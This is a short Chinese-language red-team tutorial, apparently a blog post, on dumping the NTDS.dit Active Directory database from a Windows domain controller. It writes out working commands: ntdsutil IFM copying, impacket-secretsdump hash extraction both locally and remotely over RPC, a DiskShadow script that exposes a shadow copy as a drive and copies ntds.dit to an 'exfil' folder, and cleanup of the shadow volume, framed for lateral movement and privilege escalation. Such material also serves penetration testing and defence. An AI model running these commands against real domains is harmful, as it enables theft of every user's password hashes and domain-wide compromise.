NTDS.dit转储 9 months ago red.ghostwolflab.com 1 minute NTDS.dit 文件是 Windows 域控制器上的一个数据库文件,它存储了域内的所有数据,包括用户、组、计算机、组策略、组织单元等。NTDS.dit 文件的位置通常是 C:\Windows\NTDS\NTDS.ditNTDS.dit 文件是域渗透的重要目标,因为它包含了用户的凭证信息,如密码哈希、PIN 码和 Kerberos 票据等。如果攻击者能够获取 NTDS.dit 文件,就可以利用一些工具和技术,如 mimikatz、secretsdump、vssadmin 等,来提取或利用用户的凭证,从而在域内进行横向移动或提权 Ntdsutil 自 Windows Server 2008 起,可以使用 Ntdsutil 工具复制 NTDS.dit 文件: ntdsutil "ac i ntds" "ifm" "create full C:\Users\Administrator\Desktop\ntds" quit quit 将生成的文件夹中的system和ntds.dit文件移动到Kali Linux主机并输入以下命令即可提取HASH: ┌──(root㉿kali)-[~] └─# impacket-secretsdump -system system -ntds ntds.dit local 如果攻击者有可以登录域的用户凭据,则可以通过RPC协议远程转储 NTDS.dit的HASH: impacket-secretsdump -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER> DiskShadow 编写shadow.txt文件如下: set context persistent nowriters set metadata c:\exfil\metadata.cab add volume c: alias trophy create expose %someAlias% z: 该文件指示创建C盘的新卷影磁盘副本,并将其公开为Z:驱动器。在C盘下创建exfil文件夹并执行以下命令即可转储NTDS.dit文件: diskshadow.exe /s C:\Users\Administrator\Desktop\shadow.txt; cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit 在diskshadow的交互模式,使用以下命令即可删除影子卷: delete shadows volume trophy reset 工具 ntdsdotsqlite:将 NTDS.dit 文件转换为 SQLite 格式的小实用程序该工具会提取域对象、用户帐户、计算机帐户、组、组织单位和容器